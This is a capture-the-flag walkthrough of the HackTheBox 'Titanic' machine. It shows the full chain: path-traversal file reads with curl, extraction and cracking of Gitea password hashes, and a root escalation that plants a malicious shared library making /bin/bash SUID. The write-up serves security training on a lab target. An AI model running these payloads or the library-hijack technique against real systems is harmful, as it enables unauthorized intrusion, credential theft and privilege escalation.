Hey Hackers! 👾

A fresh machine just dropped on HackTheBox (launched 16 Feb 2025), and it’s begging to be hacked! 🔥

⚡ Level: Easy
⚡ Link: https://app.hackthebox.com/machines/Titanic

Let’s get to the fun stuff:

🔍 Port Scanning
🗂️ Directory Enumeration
🔧 Manual Exploration
🐚 Shell as developer
🚀 Privilege Escalation

Ready? Let’s go hack this thing! 💻⚔️

Port Scanning

rustscan -a 10.10.11.55 -r 1-65535 -- -A -oN ports.txt 

• Only ports 80 and 22 are open.
• Let’s access the website — just add your IP to the hosts file.

echo '10.10.11.55 titanic.htb' | sudo tee -a /etc/hosts

• Now, let’s explore the site to see what it
• At the same time, start your directory enumeration.

Directory Enumeration

gobuster dir -u titanic.htb -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 100 -x html,txt,php -o gobuster.txt

• Apart from these two directories, I didn’t find anything interesting in the directory enumeration.
• So, let’s check out the website and explore its content.

Initial Access

• There’s only a “Book Now” option available, so let’s quickly check it out.

• To understand its basic functionality, I entered some random data and submitted the form.

• Upon submission, the data was converted into a JSON file and downloaded locally, serving as a ticket to board the Titanic ship.

• In this type of functionality, where a file is being downloaded, LFI is a great attack vector to test.
• Now, let’s fire up Burp Suite and intercept the request.

• Send the request and capture the response to observe what happens.

• It reveals the path from which our file is being downloaded. Just click on the “Follow Redirection” button to capture the download request.

• After this, try accessing the “passwd” file. It was easy to get into this machine using this payload.

Local File Inclusion

• I tried accessing a lot of things here, but unfortunately, I kept coming up empty-handed every time — whether it was the id_rsa, authorized keys, or log files. Nothing interesting was found.
• So, I’ve decided to start host fuzzing since I couldn’t find anything here.

Subdomain Enumeration

gobuster vhost -u titanic.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain -t 100 2>/dev/null --follow-redirect

• Add “dev.titanic.htb” to your /etc/hosts file, just like we did at the beginning.

• Let’s head over to “dev.titanic.htb”.

• Since I’ve dealt with this Gitea in another CTF, I directly clicked on the “Explore” button.

• I checked both directories and found the credentials and the path.

• By default, Gitea stores its credentials in a gitea.db file, so let’s try to access this .db file through the LFI vulnerability we discovered.

Hash Extraction from DB file

• Let’s use curl to retrieve the gitea.db file and store it locally.

curl http://titanic.htb/download?ticket=../../../home/developer/gitea/data/gitea/gitea.db -o gitea.db

• Now, we need to extract the hashes from this file. I tried doing it manually, but it didn’t work out, so let’s use a tool available on GitHub for this purpose.

GitHub – YukaFake/extract_hash_to_pbkdf2: This is a small script to extract hash once you have the…

This is a small script to extract hash once you have the gitea db file, it is recommended for some machines for Hack…

github.com

• Download this file and run it with this command.

./extract_hash_format.sh gitea.db > hashes.txt

• We won’t be decrypting them directly. Instead, we’ll use Hashcat. But before that, let’s extract the name subsection from the file so that Hashcat can understand it clearly and avoid any errors.

• I just extracted the username subsection and the administrator hash because it won’t crack — I already tried cracking that one.

Hash Cracking

hashcat -m 10900 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt --force

• It successfully cracked the password for the user “developer.”

• Let’s SSH into the machine and gain our initial access.

Shell as “developer” user

• Here’s our shell, and we’ve successfully submitted the “user.txt” file.

Privilege Escalation

• You might get stuck here like I did, as I checked almost everything, including the sudoers file, SUIDs, cronjobs, any malicious files, and
• At this point, it’s better to run LinPEAS, and if you take a close look at the output, you’ll notice a binary: “/usr/bin/magick”.

magick --version

• Do a quick Google search, and you’ll come across this GitHub resource.

• Just scroll down, and you’ll find this.

• Now we have everything we need. We just need a file that runs “magick” with root privileges. Once we have that, we can place our shared library in the respective directory, and whenever that file is executed, our shared library will run.
• In LinPEAS, you’ll notice a few “interesting paths,” such as:
• /opt/scripts
• /opt/app/static/assets/images/

In “/opt/scripts/”, you’ll find this file.

• This file essentially performs three tasks:

1. It changes the directory to /opt/app/static/assets/images/.
2. It truncates (empties) the metadata.log file in that directory.
3. It then finds all the .jpg files in that directory, uses the “magick” tool to extract the metadata from those images, and stores the log into metadata.log.

• Now, we just need to place our shared library payload in
• Before that, edit the payload to give you a shell. You can try whatever works best for you.
• For me, I made /bin/bash a SUID and then executed it.

gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void init(){
    system("chmod u+s /bin/bash");
    exit(0);
}
EOF

• I pasted this in “/opt/app/static/assets/images/” and pressed enter.

• Now, we just need one thing: a way to run this file as root, which will make /bin/bash a SUID, allowing us to execute it and gain a root shell.
• Thanks to my friend “Yannis”, who noticed that a hidden cron job is running this binary every 20 seconds and then deleting the file after execution.
• So, I simply waited for 20 seconds, and then I executed the bash command.

/bin/bash -p 

Thank you! I hope you enjoyed this walkthrough.

Buy me a coffee : https://buymeacoffee.com/rghacker

Youtube : https://www.youtube.com/@theunixverse77